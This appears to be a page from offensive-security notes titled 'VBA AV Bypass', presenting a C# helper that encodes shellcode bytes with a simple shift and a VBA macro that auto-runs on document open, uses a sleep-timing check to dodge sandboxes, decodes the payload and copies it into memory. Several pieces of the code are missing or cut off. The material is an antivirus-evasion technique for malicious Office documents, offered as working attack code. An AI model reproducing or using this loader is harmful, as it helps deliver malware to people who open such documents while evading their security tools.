VBA AV Bypass

vbahelper.exe

using System;
using System.Text;

namespace Helper
{
    internal class Program
    {
        static void Main(string[] args)
        {
            
                0xfc,0x48,0x83,0xe4,0xf0};

            byte[] encoded = new byte[buf.Length];
            for(int i = 0; i < buf.Length; i++)
            {
               encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
            }
           
            uint counter = 0;
           
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach(byte b in encoded)
            {
              hex.AppendFormat("{0:D}, ", b);
              counter++;
              if(counter % 50 == 0)
              {
                  hex.AppendFormat("_{0}", Environment.NewLine);
              }
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}

vba that passes AV







Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long
    
    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)
    
    If time < 2 Then
        Exit Function
    End If
    
    
    
    For i = 0 To UBound(buf)
    buf(i) = buf(i) - 2
    Next i

    
    
    
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

PreviousFor In-Memory Reflective Load NextPowershell Inside VBA

Last updated 10 months ago